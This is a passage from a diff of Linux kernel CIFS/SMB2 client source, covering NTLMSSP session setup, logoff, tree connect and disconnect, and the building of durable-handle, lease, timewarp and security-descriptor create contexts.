++	if (rc)
++		goto out;
++
++	cifs_dbg(FYI, "rawntlmssp session setup challenge phase\n");
++
++	spin_lock(&ses->ses_lock);
++	is_binding = (ses->ses_status == SES_GOOD);
++	spin_unlock(&ses->ses_lock);
++
++	/* keep existing ses id and flags if binding */
++	if (!is_binding) {
++		ses->Suid = le64_to_cpu(rsp->hdr.SessionId);
++		ses->session_flags = le16_to_cpu(rsp->SessionFlags);
++	}
++
++out:
++	kfree_sensitive(ntlmssp_blob);
++	SMB2_sess_free_buffer(sess_data);
++	if (!rc) {
++		sess_data->result = 0;
++		sess_data->func = SMB2_sess_auth_rawntlmssp_authenticate;
++		return;
++	}
++out_err:
++	kfree_sensitive(ses->ntlmssp);
++	ses->ntlmssp = NULL;
++	sess_data->result = rc;
++	sess_data->func = NULL;
++}
++
++static void
++SMB2_sess_auth_rawntlmssp_authenticate(struct SMB2_sess_data *sess_data)
++{
++	int rc;
++	struct cifs_ses *ses = sess_data->ses;
++	struct TCP_Server_Info *server = sess_data->server;
++	struct smb2_sess_setup_req *req;
++	struct smb2_sess_setup_rsp *rsp = NULL;
++	unsigned char *ntlmssp_blob = NULL;
++	bool use_spnego = false; /* else use raw ntlmssp */
++	u16 blob_length = 0;
++	bool is_binding = false;
++
++	rc = SMB2_sess_alloc_buffer(sess_data);
++	if (rc)
++		goto out;
++
++	req = (struct smb2_sess_setup_req *) sess_data->iov[0].iov_base;
++	req->hdr.SessionId = cpu_to_le64(ses->Suid);
++
++	rc = build_ntlmssp_auth_blob(&ntlmssp_blob, &blob_length,
++				     ses, server,
++				     sess_data->nls_cp);
++	if (rc) {
++		cifs_dbg(FYI, "build_ntlmssp_auth_blob failed %d\n", rc);
++		goto out;
++	}
++
++	if (use_spnego) {
++		/* BB eventually need to add this */
++		cifs_dbg(VFS, "spnego not supported for SMB2 yet\n");
++		rc = -EOPNOTSUPP;
++		goto out;
++	}
++	sess_data->iov[1].iov_base = ntlmssp_blob;
++	sess_data->iov[1].iov_len = blob_length;
++
++	rc = SMB2_sess_sendreceive(sess_data);
++	if (rc)
++		goto out;
++
++	rsp = (struct smb2_sess_setup_rsp *)sess_data->iov[0].iov_base;
++
++	spin_lock(&ses->ses_lock);
++	is_binding = (ses->ses_status == SES_GOOD);
++	spin_unlock(&ses->ses_lock);
++
++	/* keep existing ses id and flags if binding */
++	if (!is_binding) {
++		ses->Suid = le64_to_cpu(rsp->hdr.SessionId);
++		ses->session_flags = le16_to_cpu(rsp->SessionFlags);
++	}
++
++	rc = SMB2_sess_establish_session(sess_data);
++#ifdef CONFIG_CIFS_DEBUG_DUMP_KEYS
++	if (ses->server->dialect < SMB30_PROT_ID) {
++		cifs_dbg(VFS, "%s: dumping generated SMB2 session keys\n", __func__);
++		/*
++		 * The session id is opaque in terms of endianness, so we can't
++		 * print it as a long long. we dump it as we got it on the wire
++		 */
++		cifs_dbg(VFS, "Session Id    %*ph\n", (int)sizeof(ses->Suid),
++			 &ses->Suid);
++		cifs_dbg(VFS, "Session Key   %*ph\n",
++			 SMB2_NTLMV2_SESSKEY_SIZE, ses->auth_key.response);
++		cifs_dbg(VFS, "Signing Key   %*ph\n",
++			 SMB3_SIGN_KEY_SIZE, ses->auth_key.response);
++	}
++#endif
++out:
++	kfree_sensitive(ntlmssp_blob);
++	SMB2_sess_free_buffer(sess_data);
++	kfree_sensitive(ses->ntlmssp);
++	ses->ntlmssp = NULL;
++	sess_data->result = rc;
++	sess_data->func = NULL;
++}
++
++static int
++SMB2_select_sec(struct SMB2_sess_data *sess_data)
++{
++	int type;
++	struct cifs_ses *ses = sess_data->ses;
++	struct TCP_Server_Info *server = sess_data->server;
++
++	type = smb2_select_sectype(server, ses->sectype);
++	cifs_dbg(FYI, "sess setup type %d\n", type);
++	if (type == Unspecified) {
++		cifs_dbg(VFS, "Unable to select appropriate authentication method!\n");
++		return -EINVAL;
++	}
++
++	switch (type) {
++	case Kerberos:
++		sess_data->func = SMB2_auth_kerberos;
++		break;
++	case RawNTLMSSP:
++		sess_data->func = SMB2_sess_auth_rawntlmssp_negotiate;
++		break;
++	default:
++		cifs_dbg(VFS, "secType %d not supported!\n", type);
++		return -EOPNOTSUPP;
++	}
++
++	return 0;
++}
++
++int
++SMB2_sess_setup(const unsigned int xid, struct cifs_ses *ses,
++		struct TCP_Server_Info *server,
++		const struct nls_table *nls_cp)
++{
++	int rc = 0;
++	struct SMB2_sess_data *sess_data;
++
++	cifs_dbg(FYI, "Session Setup\n");
++
++	if (!server) {
++		WARN(1, "%s: server is NULL!\n", __func__);
++		return -EIO;
++	}
++
++	sess_data = kzalloc(sizeof(struct SMB2_sess_data), GFP_KERNEL);
++	if (!sess_data)
++		return -ENOMEM;
++
++	sess_data->xid = xid;
++	sess_data->ses = ses;
++	sess_data->server = server;
++	sess_data->buf0_type = CIFS_NO_BUFFER;
++	sess_data->nls_cp = (struct nls_table *) nls_cp;
++	sess_data->previous_session = ses->Suid;
++
++	rc = SMB2_select_sec(sess_data);
++	if (rc)
++		goto out;
++
++	/*
++	 * Initialize the session hash with the server one.
++	 */
++	memcpy(ses->preauth_sha_hash, server->preauth_sha_hash,
++	       SMB2_PREAUTH_HASH_SIZE);
++
++	while (sess_data->func)
++		sess_data->func(sess_data);
++
++	if ((ses->session_flags & SMB2_SESSION_FLAG_IS_GUEST) && (ses->sign))
++		cifs_server_dbg(VFS, "signing requested but authenticated as guest\n");
++	rc = sess_data->result;
++out:
++	kfree_sensitive(sess_data);
++	return rc;
++}
++
++int
++SMB2_logoff(const unsigned int xid, struct cifs_ses *ses)
++{
++	struct smb_rqst rqst;
++	struct smb2_logoff_req *req; /* response is also trivial struct */
++	int rc = 0;
++	struct TCP_Server_Info *server;
++	int flags = 0;
++	unsigned int total_len;
++	struct kvec iov[1];
++	struct kvec rsp_iov;
++	int resp_buf_type;
++
++	cifs_dbg(FYI, "disconnect session %p\n", ses);
++
++	if (ses && (ses->server))
++		server = ses->server;
++	else
++		return -EIO;
++
++	/* no need to send SMB logoff if uid already closed due to reconnect */
++	spin_lock(&ses->chan_lock);
++	if (CIFS_ALL_CHANS_NEED_RECONNECT(ses)) {
++		spin_unlock(&ses->chan_lock);
++		goto smb2_session_already_dead;
++	}
++	spin_unlock(&ses->chan_lock);
++
++	rc = smb2_plain_req_init(SMB2_LOGOFF, NULL, ses->server,
++				 (void **) &req, &total_len);
++	if (rc)
++		return rc;
++
++	 /* since no tcon, smb2_init can not do this, so do here */
++	req->hdr.SessionId = cpu_to_le64(ses->Suid);
++
++	if (ses->session_flags & SMB2_SESSION_FLAG_ENCRYPT_DATA)
++		flags |= CIFS_TRANSFORM_REQ;
++	else if (server->sign)
++		req->hdr.Flags |= SMB2_FLAGS_SIGNED;
++
++	flags |= CIFS_NO_RSP_BUF;
++
++	iov[0].iov_base = (char *)req;
++	iov[0].iov_len = total_len;
++
++	memset(&rqst, 0, sizeof(struct smb_rqst));
++	rqst.rq_iov = iov;
++	rqst.rq_nvec = 1;
++
++	rc = cifs_send_recv(xid, ses, ses->server,
++			    &rqst, &resp_buf_type, flags, &rsp_iov);
++	cifs_small_buf_release(req);
++	/*
++	 * No tcon so can't do
++	 * cifs_stats_inc(&tcon->stats.smb2_stats.smb2_com_fail[SMB2...]);
++	 */
++
++smb2_session_already_dead:
++	return rc;
++}
++
++static inline void cifs_stats_fail_inc(struct cifs_tcon *tcon, uint16_t code)
++{
++	cifs_stats_inc(&tcon->stats.smb2_stats.smb2_com_failed[code]);
++}
++
++#define MAX_SHARENAME_LENGTH (255 /* server */ + 80 /* share */ + 1 /* NULL */)
++
++/* These are similar values to what Windows uses */
++static inline void init_copy_chunk_defaults(struct cifs_tcon *tcon)
++{
++	tcon->max_chunks = 256;
++	tcon->max_bytes_chunk = 1048576;
++	tcon->max_bytes_copy = 16777216;
++}
++
++int
++SMB2_tcon(const unsigned int xid, struct cifs_ses *ses, const char *tree,
++	  struct cifs_tcon *tcon, const struct nls_table *cp)
++{
++	struct smb_rqst rqst;
++	struct smb2_tree_connect_req *req;
++	struct smb2_tree_connect_rsp *rsp = NULL;
++	struct kvec iov[2];
++	struct kvec rsp_iov = { NULL, 0 };
++	int rc = 0;
++	int resp_buftype;
++	int unc_path_len;
++	__le16 *unc_path = NULL;
++	int flags = 0;
++	unsigned int total_len;
++	struct TCP_Server_Info *server;
++
++	/* always use master channel */
++	server = ses->server;
++
++	cifs_dbg(FYI, "TCON\n");
++
++	if (!server || !tree)
++		return -EIO;
++
++	unc_path = kmalloc(MAX_SHARENAME_LENGTH * 2, GFP_KERNEL);
++	if (unc_path == NULL)
++		return -ENOMEM;
++
++	unc_path_len = cifs_strtoUTF16(unc_path, tree, strlen(tree), cp) + 1;
++	unc_path_len *= 2;
++	if (unc_path_len < 2) {
++		kfree(unc_path);
++		return -EINVAL;
++	}
++
++	/* SMB2 TREE_CONNECT request must be called with TreeId == 0 */
++	tcon->tid = 0;
++	atomic_set(&tcon->num_remote_opens, 0);
++	rc = smb2_plain_req_init(SMB2_TREE_CONNECT, tcon, server,
++				 (void **) &req, &total_len);
++	if (rc) {
++		kfree(unc_path);
++		return rc;
++	}
++
++	if (smb3_encryption_required(tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	iov[0].iov_base = (char *)req;
++	/* 1 for pad */
++	iov[0].iov_len = total_len - 1;
++
++	/* Testing shows that buffer offset must be at location of Buffer[0] */
++	req->PathOffset = cpu_to_le16(sizeof(struct smb2_tree_connect_req)
++			- 1 /* pad */);
++	req->PathLength = cpu_to_le16(unc_path_len - 2);
++	iov[1].iov_base = unc_path;
++	iov[1].iov_len = unc_path_len;
++
++	/*
++	 * 3.11 tcon req must be signed if not encrypted. See MS-SMB2 3.2.4.1.1
++	 * unless it is guest or anonymous user. See MS-SMB2 3.2.5.3.1
++	 * (Samba servers don't always set the flag so also check if null user)
++	 */
++	if ((server->dialect == SMB311_PROT_ID) &&
++	    !smb3_encryption_required(tcon) &&
++	    !(ses->session_flags &
++		    (SMB2_SESSION_FLAG_IS_GUEST|SMB2_SESSION_FLAG_IS_NULL)) &&
++	    ((ses->user_name != NULL) || (ses->sectype == Kerberos)))
++		req->hdr.Flags |= SMB2_FLAGS_SIGNED;
++
++	memset(&rqst, 0, sizeof(struct smb_rqst));
++	rqst.rq_iov = iov;
++	rqst.rq_nvec = 2;
++
++	/* Need 64 for max size write so ask for more in case not there yet */
++	req->hdr.CreditRequest = cpu_to_le16(64);
++
++	rc = cifs_send_recv(xid, ses, server,
++			    &rqst, &resp_buftype, flags, &rsp_iov);
++	cifs_small_buf_release(req);
++	rsp = (struct smb2_tree_connect_rsp *)rsp_iov.iov_base;
++	trace_smb3_tcon(xid, tcon->tid, ses->Suid, tree, rc);
++	if ((rc != 0) || (rsp == NULL)) {
++		cifs_stats_fail_inc(tcon, SMB2_TREE_CONNECT_HE);
++		tcon->need_reconnect = true;
++		goto tcon_error_exit;
++	}
++
++	switch (rsp->ShareType) {
++	case SMB2_SHARE_TYPE_DISK:
++		cifs_dbg(FYI, "connection to disk share\n");
++		break;
++	case SMB2_SHARE_TYPE_PIPE:
++		tcon->pipe = true;
++		cifs_dbg(FYI, "connection to pipe share\n");
++		break;
++	case SMB2_SHARE_TYPE_PRINT:
++		tcon->print = true;
++		cifs_dbg(FYI, "connection to printer\n");
++		break;
++	default:
++		cifs_server_dbg(VFS, "unknown share type %d\n", rsp->ShareType);
++		rc = -EOPNOTSUPP;
++		goto tcon_error_exit;
++	}
++
++	tcon->share_flags = le32_to_cpu(rsp->ShareFlags);
++	tcon->capabilities = rsp->Capabilities; /* we keep caps little endian */
++	tcon->maximal_access = le32_to_cpu(rsp->MaximalAccess);
++	tcon->tid = le32_to_cpu(rsp->hdr.Id.SyncId.TreeId);
++	strscpy(tcon->tree_name, tree, sizeof(tcon->tree_name));
++
++	if ((rsp->Capabilities & SMB2_SHARE_CAP_DFS) &&
++	    ((tcon->share_flags & SHI1005_FLAGS_DFS) == 0))
++		cifs_tcon_dbg(VFS, "DFS capability contradicts DFS flag\n");
++
++	if (tcon->seal &&
++	    !(server->capabilities & SMB2_GLOBAL_CAP_ENCRYPTION))
++		cifs_tcon_dbg(VFS, "Encryption is requested but not supported\n");
++
++	init_copy_chunk_defaults(tcon);
++	if (server->ops->validate_negotiate)
++		rc = server->ops->validate_negotiate(xid, tcon);
++tcon_exit:
++
++	free_rsp_buf(resp_buftype, rsp);
++	kfree(unc_path);
++	return rc;
++
++tcon_error_exit:
++	if (rsp && rsp->hdr.Status == STATUS_BAD_NETWORK_NAME)
++		cifs_tcon_dbg(VFS, "BAD_NETWORK_NAME: %s\n", tree);
++	goto tcon_exit;
++}
++
++int
++SMB2_tdis(const unsigned int xid, struct cifs_tcon *tcon)
++{
++	struct smb_rqst rqst;
++	struct smb2_tree_disconnect_req *req; /* response is trivial */
++	int rc = 0;
++	struct cifs_ses *ses = tcon->ses;
++	int flags = 0;
++	unsigned int total_len;
++	struct kvec iov[1];
++	struct kvec rsp_iov;
++	int resp_buf_type;
++
++	cifs_dbg(FYI, "Tree Disconnect\n");
++
++	if (!ses || !(ses->server))
++		return -EIO;
++
++	trace_smb3_tdis_enter(xid, tcon->tid, ses->Suid, tcon->tree_name);
++	spin_lock(&ses->chan_lock);
++	if ((tcon->need_reconnect) ||
++	    (CIFS_ALL_CHANS_NEED_RECONNECT(tcon->ses))) {
++		spin_unlock(&ses->chan_lock);
++		return 0;
++	}
++	spin_unlock(&ses->chan_lock);
++
++	invalidate_all_cached_dirs(tcon);
++
++	rc = smb2_plain_req_init(SMB2_TREE_DISCONNECT, tcon, ses->server,
++				 (void **) &req,
++				 &total_len);
++	if (rc)
++		return rc;
++
++	if (smb3_encryption_required(tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	flags |= CIFS_NO_RSP_BUF;
++
++	iov[0].iov_base = (char *)req;
++	iov[0].iov_len = total_len;
++
++	memset(&rqst, 0, sizeof(struct smb_rqst));
++	rqst.rq_iov = iov;
++	rqst.rq_nvec = 1;
++
++	rc = cifs_send_recv(xid, ses, ses->server,
++			    &rqst, &resp_buf_type, flags, &rsp_iov);
++	cifs_small_buf_release(req);
++	if (rc) {
++		cifs_stats_fail_inc(tcon, SMB2_TREE_DISCONNECT_HE);
++		trace_smb3_tdis_err(xid, tcon->tid, ses->Suid, rc);
++	}
++	trace_smb3_tdis_done(xid, tcon->tid, ses->Suid);
++
++	return rc;
++}
++
++
++static struct create_durable *
++create_durable_buf(void)
++{
++	struct create_durable *buf;
++
++	buf = kzalloc(sizeof(struct create_durable), GFP_KERNEL);
++	if (!buf)
++		return NULL;
++
++	buf->ccontext.DataOffset = cpu_to_le16(offsetof
++					(struct create_durable, Data));
++	buf->ccontext.DataLength = cpu_to_le32(16);
++	buf->ccontext.NameOffset = cpu_to_le16(offsetof
++				(struct create_durable, Name));
++	buf->ccontext.NameLength = cpu_to_le16(4);
++	/* SMB2_CREATE_DURABLE_HANDLE_REQUEST is "DHnQ" */
++	buf->Name[0] = 'D';
++	buf->Name[1] = 'H';
++	buf->Name[2] = 'n';
++	buf->Name[3] = 'Q';
++	return buf;
++}
++
++static struct create_durable *
++create_reconnect_durable_buf(struct cifs_fid *fid)
++{
++	struct create_durable *buf;
++
++	buf = kzalloc(sizeof(struct create_durable), GFP_KERNEL);
++	if (!buf)
++		return NULL;
++
++	buf->ccontext.DataOffset = cpu_to_le16(offsetof
++					(struct create_durable, Data));
++	buf->ccontext.DataLength = cpu_to_le32(16);
++	buf->ccontext.NameOffset = cpu_to_le16(offsetof
++				(struct create_durable, Name));
++	buf->ccontext.NameLength = cpu_to_le16(4);
++	buf->Data.Fid.PersistentFileId = fid->persistent_fid;
++	buf->Data.Fid.VolatileFileId = fid->volatile_fid;
++	/* SMB2_CREATE_DURABLE_HANDLE_RECONNECT is "DHnC" */
++	buf->Name[0] = 'D';
++	buf->Name[1] = 'H';
++	buf->Name[2] = 'n';
++	buf->Name[3] = 'C';
++	return buf;
++}
++
++static void
++parse_query_id_ctxt(struct create_context *cc, struct smb2_file_all_info *buf)
++{
++	struct create_on_disk_id *pdisk_id = (struct create_on_disk_id *)cc;
++
++	cifs_dbg(FYI, "parse query id context 0x%llx 0x%llx\n",
++		pdisk_id->DiskFileId, pdisk_id->VolumeId);
++	buf->IndexNumber = pdisk_id->DiskFileId;
++}
++
++static void
++parse_posix_ctxt(struct create_context *cc, struct smb2_file_all_info *info,
++		 struct create_posix_rsp *posix)
++{
++	int sid_len;
++	u8 *beg = (u8 *)cc + le16_to_cpu(cc->DataOffset);
++	u8 *end = beg + le32_to_cpu(cc->DataLength);
++	u8 *sid;
++
++	memset(posix, 0, sizeof(*posix));
++
++	posix->nlink = le32_to_cpu(*(__le32 *)(beg + 0));
++	posix->reparse_tag = le32_to_cpu(*(__le32 *)(beg + 4));
++	posix->mode = le32_to_cpu(*(__le32 *)(beg + 8));
++
++	sid = beg + 12;
++	sid_len = posix_info_sid_size(sid, end);
++	if (sid_len < 0) {
++		cifs_dbg(VFS, "bad owner sid in posix create response\n");
++		return;
++	}
++	memcpy(&posix->owner, sid, sid_len);
++
++	sid = sid + sid_len;
++	sid_len = posix_info_sid_size(sid, end);
++	if (sid_len < 0) {
++		cifs_dbg(VFS, "bad group sid in posix create response\n");
++		return;
++	}
++	memcpy(&posix->group, sid, sid_len);
++
++	cifs_dbg(FYI, "nlink=%d mode=%o reparse_tag=%x\n",
++		 posix->nlink, posix->mode, posix->reparse_tag);
++}
++
++void
++smb2_parse_contexts(struct TCP_Server_Info *server,
++		    struct smb2_create_rsp *rsp,
++		    unsigned int *epoch, char *lease_key, __u8 *oplock,
++		    struct smb2_file_all_info *buf,
++		    struct create_posix_rsp *posix)
++{
++	char *data_offset;
++	struct create_context *cc;
++	unsigned int next;
++	unsigned int remaining;
++	char *name;
++	static const char smb3_create_tag_posix[] = {
++		0x93, 0xAD, 0x25, 0x50, 0x9C,
++		0xB4, 0x11, 0xE7, 0xB4, 0x23, 0x83,
++		0xDE, 0x96, 0x8B, 0xCD, 0x7C
++	};
++
++	*oplock = 0;
++	data_offset = (char *)rsp + le32_to_cpu(rsp->CreateContextsOffset);
++	remaining = le32_to_cpu(rsp->CreateContextsLength);
++	cc = (struct create_context *)data_offset;
++
++	/* Initialize inode number to 0 in case no valid data in qfid context */
++	if (buf)
++		buf->IndexNumber = 0;
++
++	while (remaining >= sizeof(struct create_context)) {
++		name = le16_to_cpu(cc->NameOffset) + (char *)cc;
++		if (le16_to_cpu(cc->NameLength) == 4 &&
++		    strncmp(name, SMB2_CREATE_REQUEST_LEASE, 4) == 0)
++			*oplock = server->ops->parse_lease_buf(cc, epoch,
++							   lease_key);
++		else if (buf && (le16_to_cpu(cc->NameLength) == 4) &&
++		    strncmp(name, SMB2_CREATE_QUERY_ON_DISK_ID, 4) == 0)
++			parse_query_id_ctxt(cc, buf);
++		else if ((le16_to_cpu(cc->NameLength) == 16)) {
++			if (posix &&
++			    memcmp(name, smb3_create_tag_posix, 16) == 0)
++				parse_posix_ctxt(cc, buf, posix);
++		}
++		/* else {
++			cifs_dbg(FYI, "Context not matched with len %d\n",
++				le16_to_cpu(cc->NameLength));
++			cifs_dump_mem("Cctxt name: ", name, 4);
++		} */
++
++		next = le32_to_cpu(cc->Next);
++		if (!next)
++			break;
++		remaining -= next;
++		cc = (struct create_context *)((char *)cc + next);
++	}
++
++	if (rsp->OplockLevel != SMB2_OPLOCK_LEVEL_LEASE)
++		*oplock = rsp->OplockLevel;
++
++	return;
++}
++
++static int
++add_lease_context(struct TCP_Server_Info *server, struct kvec *iov,
++		  unsigned int *num_iovec, u8 *lease_key, __u8 *oplock)
++{
++	struct smb2_create_req *req = iov[0].iov_base;
++	unsigned int num = *num_iovec;
++
++	iov[num].iov_base = server->ops->create_lease_buf(lease_key, *oplock);
++	if (iov[num].iov_base == NULL)
++		return -ENOMEM;
++	iov[num].iov_len = server->vals->create_lease_size;
++	req->RequestedOplockLevel = SMB2_OPLOCK_LEVEL_LEASE;
++	if (!req->CreateContextsOffset)
++		req->CreateContextsOffset = cpu_to_le32(
++				sizeof(struct smb2_create_req) +
++				iov[num - 1].iov_len);
++	le32_add_cpu(&req->CreateContextsLength,
++		     server->vals->create_lease_size);
++	*num_iovec = num + 1;
++	return 0;
++}
++
++static struct create_durable_v2 *
++create_durable_v2_buf(struct cifs_open_parms *oparms)
++{
++	struct cifs_fid *pfid = oparms->fid;
++	struct create_durable_v2 *buf;
++
++	buf = kzalloc(sizeof(struct create_durable_v2), GFP_KERNEL);
++	if (!buf)
++		return NULL;
++
++	buf->ccontext.DataOffset = cpu_to_le16(offsetof
++					(struct create_durable_v2, dcontext));
++	buf->ccontext.DataLength = cpu_to_le32(sizeof(struct durable_context_v2));
++	buf->ccontext.NameOffset = cpu_to_le16(offsetof
++				(struct create_durable_v2, Name));
++	buf->ccontext.NameLength = cpu_to_le16(4);
++
++	/*
++	 * NB: Handle timeout defaults to 0, which allows server to choose
++	 * (most servers default to 120 seconds) and most clients default to 0.
++	 * This can be overridden at mount ("handletimeout=") if the user wants
++	 * a different persistent (or resilient) handle timeout for all opens
++	 * opens on a particular SMB3 mount.
++	 */
++	buf->dcontext.Timeout = cpu_to_le32(oparms->tcon->handle_timeout);
++	buf->dcontext.Flags = cpu_to_le32(SMB2_DHANDLE_FLAG_PERSISTENT);
++	generate_random_uuid(buf->dcontext.CreateGuid);
++	memcpy(pfid->create_guid, buf->dcontext.CreateGuid, 16);
++
++	/* SMB2_CREATE_DURABLE_HANDLE_REQUEST is "DH2Q" */
++	buf->Name[0] = 'D';
++	buf->Name[1] = 'H';
++	buf->Name[2] = '2';
++	buf->Name[3] = 'Q';
++	return buf;
++}
++
++static struct create_durable_handle_reconnect_v2 *
++create_reconnect_durable_v2_buf(struct cifs_fid *fid)
++{
++	struct create_durable_handle_reconnect_v2 *buf;
++
++	buf = kzalloc(sizeof(struct create_durable_handle_reconnect_v2),
++			GFP_KERNEL);
++	if (!buf)
++		return NULL;
++
++	buf->ccontext.DataOffset =
++		cpu_to_le16(offsetof(struct create_durable_handle_reconnect_v2,
++				     dcontext));
++	buf->ccontext.DataLength =
++		cpu_to_le32(sizeof(struct durable_reconnect_context_v2));
++	buf->ccontext.NameOffset =
++		cpu_to_le16(offsetof(struct create_durable_handle_reconnect_v2,
++			    Name));
++	buf->ccontext.NameLength = cpu_to_le16(4);
++
++	buf->dcontext.Fid.PersistentFileId = fid->persistent_fid;
++	buf->dcontext.Fid.VolatileFileId = fid->volatile_fid;
++	buf->dcontext.Flags = cpu_to_le32(SMB2_DHANDLE_FLAG_PERSISTENT);
++	memcpy(buf->dcontext.CreateGuid, fid->create_guid, 16);
++
++	/* SMB2_CREATE_DURABLE_HANDLE_RECONNECT_V2 is "DH2C" */
++	buf->Name[0] = 'D';
++	buf->Name[1] = 'H';
++	buf->Name[2] = '2';
++	buf->Name[3] = 'C';
++	return buf;
++}
++
++static int
++add_durable_v2_context(struct kvec *iov, unsigned int *num_iovec,
++		    struct cifs_open_parms *oparms)
++{
++	struct smb2_create_req *req = iov[0].iov_base;
++	unsigned int num = *num_iovec;
++
++	iov[num].iov_base = create_durable_v2_buf(oparms);
++	if (iov[num].iov_base == NULL)
++		return -ENOMEM;
++	iov[num].iov_len = sizeof(struct create_durable_v2);
++	if (!req->CreateContextsOffset)
++		req->CreateContextsOffset =
++			cpu_to_le32(sizeof(struct smb2_create_req) +
++								iov[1].iov_len);
++	le32_add_cpu(&req->CreateContextsLength, sizeof(struct create_durable_v2));
++	*num_iovec = num + 1;
++	return 0;
++}
++
++static int
++add_durable_reconnect_v2_context(struct kvec *iov, unsigned int *num_iovec,
++		    struct cifs_open_parms *oparms)
++{
++	struct smb2_create_req *req = iov[0].iov_base;
++	unsigned int num = *num_iovec;
++
++	/* indicate that we don't need to relock the file */
++	oparms->reconnect = false;
++
++	iov[num].iov_base = create_reconnect_durable_v2_buf(oparms->fid);
++	if (iov[num].iov_base == NULL)
++		return -ENOMEM;
++	iov[num].iov_len = sizeof(struct create_durable_handle_reconnect_v2);
++	if (!req->CreateContextsOffset)
++		req->CreateContextsOffset =
++			cpu_to_le32(sizeof(struct smb2_create_req) +
++								iov[1].iov_len);
++	le32_add_cpu(&req->CreateContextsLength,
++			sizeof(struct create_durable_handle_reconnect_v2));
++	*num_iovec = num + 1;
++	return 0;
++}
++
++static int
++add_durable_context(struct kvec *iov, unsigned int *num_iovec,
++		    struct cifs_open_parms *oparms, bool use_persistent)
++{
++	struct smb2_create_req *req = iov[0].iov_base;
++	unsigned int num = *num_iovec;
++
++	if (use_persistent) {
++		if (oparms->reconnect)
++			return add_durable_reconnect_v2_context(iov, num_iovec,
++								oparms);
++		else
++			return add_durable_v2_context(iov, num_iovec, oparms);
++	}
++
++	if (oparms->reconnect) {
++		iov[num].iov_base = create_reconnect_durable_buf(oparms->fid);
++		/* indicate that we don't need to relock the file */
++		oparms->reconnect = false;
++	} else
++		iov[num].iov_base = create_durable_buf();
++	if (iov[num].iov_base == NULL)
++		return -ENOMEM;
++	iov[num].iov_len = sizeof(struct create_durable);
++	if (!req->CreateContextsOffset)
++		req->CreateContextsOffset =
++			cpu_to_le32(sizeof(struct smb2_create_req) +
++								iov[1].iov_len);
++	le32_add_cpu(&req->CreateContextsLength, sizeof(struct create_durable));
++	*num_iovec = num + 1;
++	return 0;
++}
++
++/* See MS-SMB2 2.2.13.2.7 */
++static struct crt_twarp_ctxt *
++create_twarp_buf(__u64 timewarp)
++{
++	struct crt_twarp_ctxt *buf;
++
++	buf = kzalloc(sizeof(struct crt_twarp_ctxt), GFP_KERNEL);
++	if (!buf)
++		return NULL;
++
++	buf->ccontext.DataOffset = cpu_to_le16(offsetof
++					(struct crt_twarp_ctxt, Timestamp));
++	buf->ccontext.DataLength = cpu_to_le32(8);
++	buf->ccontext.NameOffset = cpu_to_le16(offsetof
++				(struct crt_twarp_ctxt, Name));
++	buf->ccontext.NameLength = cpu_to_le16(4);
++	/* SMB2_CREATE_TIMEWARP_TOKEN is "TWrp" */
++	buf->Name[0] = 'T';
++	buf->Name[1] = 'W';
++	buf->Name[2] = 'r';
++	buf->Name[3] = 'p';
++	buf->Timestamp = cpu_to_le64(timewarp);
++	return buf;
++}
++
++/* See MS-SMB2 2.2.13.2.7 */
++static int
++add_twarp_context(struct kvec *iov, unsigned int *num_iovec, __u64 timewarp)
++{
++	struct smb2_create_req *req = iov[0].iov_base;
++	unsigned int num = *num_iovec;
++
++	iov[num].iov_base = create_twarp_buf(timewarp);
++	if (iov[num].iov_base == NULL)
++		return -ENOMEM;
++	iov[num].iov_len = sizeof(struct crt_twarp_ctxt);
++	if (!req->CreateContextsOffset)
++		req->CreateContextsOffset = cpu_to_le32(
++				sizeof(struct smb2_create_req) +
++				iov[num - 1].iov_len);
++	le32_add_cpu(&req->CreateContextsLength, sizeof(struct crt_twarp_ctxt));
++	*num_iovec = num + 1;
++	return 0;
++}
++
++/* See See http://technet.microsoft.com/en-us/library/hh509017(v=ws.10).aspx */
++static void setup_owner_group_sids(char *buf)
++{
++	struct owner_group_sids *sids = (struct owner_group_sids *)buf;
++
++	/* Populate the user ownership fields S-1-5-88-1 */
++	sids->owner.Revision = 1;
++	sids->owner.NumAuth = 3;
++	sids->owner.Authority[5] = 5;
++	sids->owner.SubAuthorities[0] = cpu_to_le32(88);
++	sids->owner.SubAuthorities[1] = cpu_to_le32(1);
++	sids->owner.SubAuthorities[2] = cpu_to_le32(current_fsuid().val);
++
++	/* Populate the group ownership fields S-1-5-88-2 */
++	sids->group.Revision = 1;
++	sids->group.NumAuth = 3;
++	sids->group.Authority[5] = 5;
++	sids->group.SubAuthorities[0] = cpu_to_le32(88);
++	sids->group.SubAuthorities[1] = cpu_to_le32(2);
++	sids->group.SubAuthorities[2] = cpu_to_le32(current_fsgid().val);
++
++	cifs_dbg(FYI, "owner S-1-5-88-1-%d, group S-1-5-88-2-%d\n", current_fsuid().val, current_fsgid().val);
++}
++
++/* See MS-SMB2 2.2.13.2.2 and MS-DTYP 2.4.6 */
++static struct crt_sd_ctxt *
++create_sd_buf(umode_t mode, bool set_owner, unsigned int *len)
++{
++	struct crt_sd_ctxt *buf;
++	__u8 *ptr, *aclptr;
++	unsigned int acelen, acl_size, ace_count;
++	unsigned int owner_offset = 0;
++	unsigned int group_offset = 0;
++	struct smb3_acl acl = {};
++
++	*len = round_up(sizeof(struct crt_sd_ctxt) + (sizeof(struct cifs_ace) * 4), 8);
++
++	if (set_owner) {
++		/* sizeof(struct owner_group_sids) is already multiple of 8 so no need to round */
++		*len += sizeof(struct owner_group_sids);
++	}
++
++	buf = kzalloc(*len, GFP_KERNEL);
++	if (buf == NULL)
++		return buf;
++
++	ptr = (__u8 *)&buf[1];
++	if (set_owner) {
++		/* offset fields are from beginning of security descriptor not of create context */
++		owner_offset = ptr - (__u8 *)&buf->sd;
++		buf->sd.OffsetOwner = cpu_to_le32(owner_offset);
++		group_offset = owner_offset + offsetof(struct owner_group_sids, group);
++		buf->sd.OffsetGroup = cpu_to_le32(group_offset);
++
++		setup_owner_group_sids(ptr);
++		ptr += sizeof(struct owner_group_sids);
++	} else {
++		buf->sd.OffsetOwner = 0;
++		buf->sd.OffsetGroup = 0;
++	}
++
++	buf->ccontext.DataOffset = cpu_to_le16(offsetof(struct crt_sd_ctxt, sd));
++	buf->ccontext.NameOffset = cpu_to_le16(offsetof(struct crt_sd_ctxt, Name));
++	buf->ccontext.NameLength = cpu_to_le16(4);
++	/* SMB2_CREATE_SD_BUFFER_TOKEN is "SecD" */
++	buf->Name[0] = 'S';
++	buf->Name[1] = 'e';
++	buf->Name[2] = 'c';
++	buf->Name[3] = 'D';
